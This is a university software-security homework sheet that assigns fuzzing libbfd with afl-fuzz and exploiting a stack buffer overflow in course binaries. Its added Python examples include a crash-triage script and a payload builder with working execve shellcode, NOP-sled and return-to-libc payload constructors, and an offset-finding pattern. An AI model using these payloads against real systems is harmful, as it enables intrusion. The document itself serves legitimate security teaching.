
Date: 2018-11-22 10:16

Software Security

Homework #4

Due: 1pm on 12/5/2018


Please read this whole assignment before starting.


In this homework you will search for vulnerabilities in new binaries and exploit one using the methods discussed in class. You will also fuzz a real library used by many software packages.

Fuzzing Instructions

●Pick up where you left off in exploring-fuzzing-notes. Gates 5-7 were the setup necessary to start fuzzing something nontrivial. In this case, you will fuzz libbfd, a real library for working with binaries. The objdump utility we have used in this class depends on libbfd (readelf, by contrast, parses ELF on its own and does not use libbfd).

○Even though I had this installed from the exercise, I personally had to start it from scratch to get it to work. You should keep this option in mind.

●Run your fuzzer with the command

afl-fuzz -i testcases -o findings ./bfd @@

If you need more detail, there is a set of supplementary instructions for the fuzzing portion. Additionally, you should be aware that these instructions detail a method of fuzzing where you can run multiple instances of the fuzzer at once. It is slightly more complicated, but much more efficient and highly recommended.

●You do not have to explain the precise cause of the vulnerability, but you should explain how you would go about pinpointing the vulnerability (what tools/methods you would use, etc.).

●What kind of damage (if any) do you think could be done with the vulnerability / vulnerabilities that you've found?

●Include a screenshot of your afl-fuzz window after you have terminated its execution.

●Take one of the crash inputs, and use it to crash the bfd program on its own. Include a screenshot or output of you completing this task.


It is possible that you will need to run the fuzzer for many hours. It is also possible that it could find a unique crash in the first five minutes. I would recommend letting it run in the background while you are working on something else, and checking the fuzzer’s output once you are done. If this is not sufficient, you can prevent your computer from sleeping and let it fuzz overnight.
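The steps above (run the fuzzer, optionally in afl-fuzz's own -M/-S parallel mode, bucket the crashes, replay one crash input through the harness on its own, and explain how you would pinpoint the bug) can be scripted. The following is an added example, not part of the assignment or of the supplementary instructions: the harness path ./bfd, the testcases/ and findings/ directories, and the crash file names follow afl-fuzz's documented layout (findings/crashes/ for a single instance, findings/<name>/crashes/ in parallel mode, files named id:NNNNNN,sig:NN,...), and the demo_* helpers are constructed stand-ins so the script runs without afl or libbfd installed.

```python
"""Post-fuzzing triage for an afl-fuzz run against the libbfd harness.
Added example, not course material: ./bfd, findings/ and the crash file
names are assumptions based on afl-fuzz's documented output format."""
import os
import re
import subprocess
import sys
import tempfile
from collections import defaultdict

# afl-fuzz names crash files like id:000003,sig:11,src:000012,op:havoc,rep:8
CRASH_NAME = re.compile(r"^id:(\d+),sig:(\d+),(.*)$")


def parallel_commands(instances, harness="./bfd"):
    """afl-fuzz command lines for one master (-M) and N-1 secondaries (-S);
    each instance then writes its results under findings/<name>/."""
    cmds = []
    for i in range(1, instances + 1):
        role = "-M" if i == 1 else "-S"
        cmds.append(f"afl-fuzz -i testcases -o findings {role} fuzzer{i:02d} -- {harness} @@")
    return cmds


def parse_crash_name(name):
    """(id, signal, mutation info) for an AFL crash file name, else None
    (a crashes/ directory also holds a README.txt that is not a crash)."""
    m = CRASH_NAME.match(name)
    return (int(m.group(1)), int(m.group(2)), m.group(3)) if m else None


def bucket_by_signal(paths):
    """Group crash files by the signal that killed the harness
    (11 = SIGSEGV, 6 = SIGABRT from a failed assertion or glibc heap check)."""
    buckets = defaultdict(list)
    for p in paths:
        parsed = parse_crash_name(os.path.basename(p))
        if parsed:
            buckets[parsed[1]].append(p)
    return dict(buckets)


def crash_files(findings="findings"):
    """All crash inputs under findings/crashes/ (single instance) and
    findings/*/crashes/ (parallel mode), as full paths, sorted."""
    dirs = [findings] + [os.path.join(findings, d) for d in sorted(os.listdir(findings))]
    paths = []
    for d in dirs:
        cdir = os.path.join(d, "crashes")
        if os.path.isdir(cdir):
            paths += [os.path.join(cdir, f) for f in sorted(os.listdir(cdir)) if parse_crash_name(f)]
    return paths


def replay(harness_cmd, crash_path, timeout=10):
    """Run the harness on one crash input the way afl-fuzz does ('@@' becomes
    the file path). Returns the signal that killed the process, 0 for a
    clean exit, or -1 on timeout (a hang rather than a crash)."""
    cmd = [crash_path if a == "@@" else a for a in harness_cmd]
    try:
        res = subprocess.run(cmd, capture_output=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return -1
    return -res.returncode if res.returncode < 0 else 0


def gdb_command(harness_cmd, crash_path):
    """gdb invocation that runs the harness on the crash input and prints the
    backtrace at the fault: the first step in pinpointing the bug."""
    args = " ".join(crash_path if a == "@@" else a for a in harness_cmd)
    return f"gdb -q -batch -ex run -ex bt --args {args}"


def demo_findings():
    """Constructed stand-in for findings/: one parallel instance holding two
    crash files plus the README, so the functions above run without afl."""
    root = tempfile.mkdtemp(prefix="findings-")
    cdir = os.path.join(root, "fuzzer01", "crashes")
    os.makedirs(cdir)
    for name in ("id:000000,sig:11,src:000000,op:flip1,pos:0",
                 "id:000001,sig:06,src:000004,op:havoc,rep:2", "README.txt"):
        with open(os.path.join(cdir, name), "wb") as f:
            f.write(b"\x7fELF" + b"\xff" * 60)  # constructed junk, not a real crash input
    return root


def demo_segv_harness():
    """Constructed stand-in for ./bfd @@: reads the input, then raises SIGSEGV
    on itself, so replay() sees the same exit status a real crash produces."""
    return [sys.executable, "-c",
            "import os, signal, sys; open(sys.argv[1], 'rb').read();"
            " os.kill(os.getpid(), signal.SIGSEGV)", "@@"]


if __name__ == "__main__":
    root = demo_findings()            # on the VM: "findings"
    harness = demo_segv_harness()     # on the VM: ["./bfd", "@@"]
    files = crash_files(root)
    for sig, names in sorted(bucket_by_signal(files).items()):
        print(f"signal {sig}: {len(names)} crash(es)")
    for f in files:
        print(f"{f}: killed by signal {replay(harness, f)}")
        print("   ", gdb_command(harness, f))
```

On the VM, replace the two demo_* calls with "findings" and ["./bfd", "@@"]; the replay() exit status is the evidence the last bullet asks for, and the printed gdb line gives the backtrace you would start from (an ASan build of the harness, if you have one, gives the faulting source line directly).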

Exploit Instructions

●Download the file hw4.zip from Google Drive into your CSE 523 Ubuntu VM. You can decompress its contents with this command: unzip hw4.zip

●Part 1. Which of the three programs in the package exhibit a stack buffer overflow vulnerability? Provide an explanation for the answer you give for each program, and include any information or material that would be required for me to reproduce your answer.

●Part 2. At least one of the three programs will have a stack buffer overflow vulnerability. Exploit that vulnerability by opening a shell in four different ways:

1.With ASLR and NX off, by executing shellcode on the stack, and

2.with ASLR on and NX off, by executing shellcode on the stack, and

3.with ASLR off and NX on, using return-to-libc, and

4.with ASLR and NX on, using return-to-libc and a string built by your payload.

For each case, you should exploit the vulnerability in the way that we learned in class for that particular configuration. You should NOT use the same exploit for any two of the four cases.

For each case, provide all of the materials needed to reproduce your exploit, and include a transcript that demonstrates each one being used successfully. You are welcome to use the shellcode and payload patterns from class, along with any other course materials you find helpful.
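The payloads for these cases are small byte strings whose layout is the whole point, so building them in a script keeps the write-up reproducible. The following is an added example and not course material: it assumes a 32-bit x86 Linux target (little-endian 4-byte addresses), builds only cases 1 and 3 (cases 2 and 4 use whatever method was taught in class and are not shown here), uses the standard execve("/bin//sh") shellcode (you may substitute the shellcode from class), and every address and offset in it is a placeholder that must be replaced with values read from gdb on your own VM. The pattern_create/pattern_offset pair is the usual way to measure the distance from the buffer to the saved return address: feed the pattern to the program, crash it under gdb, and look up the value that landed in EIP.

```python
"""Stack-overflow payload construction for a 32-bit x86 Linux target.
Added example, not course material; all addresses are placeholders."""
import string
import struct


def p32(value):
    """Pack a 32-bit address little-endian, the byte order the stack holds."""
    return struct.pack("<I", value)


def u32(data):
    """Unpack the first 4 bytes of data as a little-endian 32-bit value."""
    return struct.unpack("<I", data[:4])[0]


# Standard 23-byte execve("/bin//sh", NULL, NULL) shellcode for 32-bit Linux:
# xor eax,eax; push eax; push "//sh"; push "/bin"; mov ebx,esp;
# xor ecx,ecx; xor edx,edx; mov al,11; int 0x80.  Contains no NUL bytes.
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80")


def pattern_create(length):
    """Metasploit-style pattern Aa0Aa1Aa2...: every 4-byte window is unique
    within the first 20280 bytes, so the value in EIP identifies the offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is not unique")


def pattern_offset(eip, length=20280):
    """Offset of the 4 pattern bytes that overwrote EIP (the value gdb shows,
    e.g. 0x41306141), or None if EIP did not come from the pattern."""
    idx = pattern_create(length).find(p32(eip))
    return None if idx < 0 else idx


def find_bad_bytes(payload, bad=b"\x00\x0a"):
    """Positions of bytes that do not survive the input path: NUL ends a
    strcpy() copy, newline ends gets()/fgets(). Empty list means clean."""
    return [i for i, b in enumerate(payload) if b in bad]


def shellcode_payload(ret_offset, sled_addr, shellcode=SHELLCODE, copies=4):
    """Case 1 (ASLR off, NX off): [NOP sled][shellcode][return address x copies].
    ret_offset is the distance from buffer start to the saved EIP and
    sled_addr any address inside the sled; both come from gdb."""
    if len(shellcode) + 16 > ret_offset:
        raise ValueError("buffer too small for a sled plus the shellcode")
    sled = b"\x90" * (ret_offset - len(shellcode))
    return sled + shellcode + p32(sled_addr) * copies


def ret2libc_payload(ret_offset, system_addr, exit_addr, binsh_addr):
    """Case 3 (ASLR off, NX on): overwrite the saved EIP with system(); the
    fake frame below it is [return address -> exit()][pointer to "/bin/sh"],
    so the shell runs without the stack being executable and exits cleanly."""
    return b"A" * ret_offset + p32(system_addr) + p32(exit_addr) + p32(binsh_addr)


if __name__ == "__main__":
    # Placeholder values (assumptions): offset 76, a stack address inside the
    # sled, and libc addresses of system(), exit() and a "/bin/sh" string.
    pat = pattern_create(200)
    print("offset of", hex(u32(pat[76:80])), "in the pattern:", pattern_offset(u32(pat[76:80])))
    p1 = shellcode_payload(76, 0xbffff5a0)
    p3 = ret2libc_payload(76, 0xb7e5b3a0, 0xb7e4e980, 0xb7f7c6b8)
    for name, p in (("case1", p1), ("case3", p3)):
        print(name, len(p), "bytes, bad bytes at", find_bad_bytes(p))
        with open(name + ".bin", "wb") as f:   # feed with ./prog "$(cat case1.bin)" or < case1.bin
            f.write(p)
```

Always run find_bad_bytes() on the final payload: an address such as 0xb7e4f000 contains a NUL, which a strcpy()-based overflow truncates silently, and the fix is to pick another address inside the sled or a different copy of the "/bin/sh" string in libc.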


For your write-up and turn-in document, make a copy of this document, rename it to hw4-notes, and move it into your CSE 523 Google Docs collection. Use this document to complete the homework, using the space provided below.


You are to complete this homework on your own. Do not ask (or answer) questions of other students; do not discuss any aspect of this homework with any other student. Direct all questions to the TA or me.


Please make use of Piazza for questions. If you have a question about the nature of the assignment, please ask that publicly on Piazza. If your question references your solution then you should ask that question privately.


With all the exercises we have done in class you have all the background you need to complete this assignment. If you have questions your first step should be to review the exercises you have already done. We have been building up to this final HW assignment all semester and this is a chance for you to show what you have learned and solve it on your own.




Your complete homework should include the following.


●Your explanations and transcripts should be clear and easy for someone to reproduce; you can assume that a reader has the same VirtualBox setup that you do.

●You should answer any questions posed in the sections above.

●You should include a screenshot of your fuzzer output once you have stopped its execution.

●You should run an input on the harness program that crashes it, and include evidence that it crashed the program successfully.

●You should show the execution of your shellcode and evidence that it worked as intended.

●Your write-up should be organized and well-written, with proper grammar and spelling.


Do not change anything above this line. Add your homework write-up below it.

